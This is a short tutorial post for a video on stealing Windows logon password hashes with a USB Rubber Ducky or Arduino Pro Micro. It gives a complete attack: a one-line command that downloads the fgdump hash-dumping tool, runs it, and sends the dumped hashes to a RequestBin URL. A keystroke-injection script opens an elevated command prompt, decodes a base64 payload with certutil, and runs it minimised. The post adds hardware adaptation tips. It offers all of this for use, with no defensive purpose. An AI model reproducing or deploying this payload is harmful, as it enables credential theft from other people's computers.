Hack Windows Passwords With USB Rubber Ducky

in this video I show you how to retrieve windows logon hashes using a USB rubber ducky and then how to decrypt them using hashcat. You will need the following code in this project…
cd /win & echo (wget 'REPLACE_WITH_FGDUMP_DOWNLOAD_LINK' -OutFile out.exe) > test.PS1 & powershell -ExecutionPolicy ByPass -File test.ps1 & START /B out.exe & ping 127.0.0.1 -n 4 > nul & echo ($passes = Get-Content c:\win\127.0.0.1.pwdump);($url = 'REPLACE_WITH_REQUESTBIN_LINK?p=' + $passes);(wget $url) > request.PS1 & powershell -ExecutionPolicy ByPass -File request.ps1 & exit
Encode the above with base64 using this, then replace PASTE_BASE_64_HERE with it
DELAY 400
GUI
DELAY 200
STRING cmd
CTRL-SHIFT ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
STRING cd / & mkdir win & cd win
ENTER
DELAY 50
STRING echo PASTE_BASE_64_HERE > base.txt
ENTER
DELAY 50
STRING certutil -decode base.txt run.bat
ENTER
DELAY 150
STRING START /MIN run.bat
ENTER
DELAY 50
STRING exit
ENTER

If you’re using the arduino pro micro remember to remove the hyphen (-) and replace with a space
CTRL-SHIFT

Also if you’re using the pro micro, just before you upload it to the arduino change the following code as shown below…
Keyboard.press(KEY_LEFT_CTRL);
delay(200); // ADD THIS
Keyboard.press(KEY_LEFT_SHIFT);
delay(200);// ADD THIS
Keyboard.press(KEY_RETURN);
delay(200);// ADD THIS
Keyboard.releaseAll();

If you have any questions feel free to ask in the comments of the video.

Leave a Reply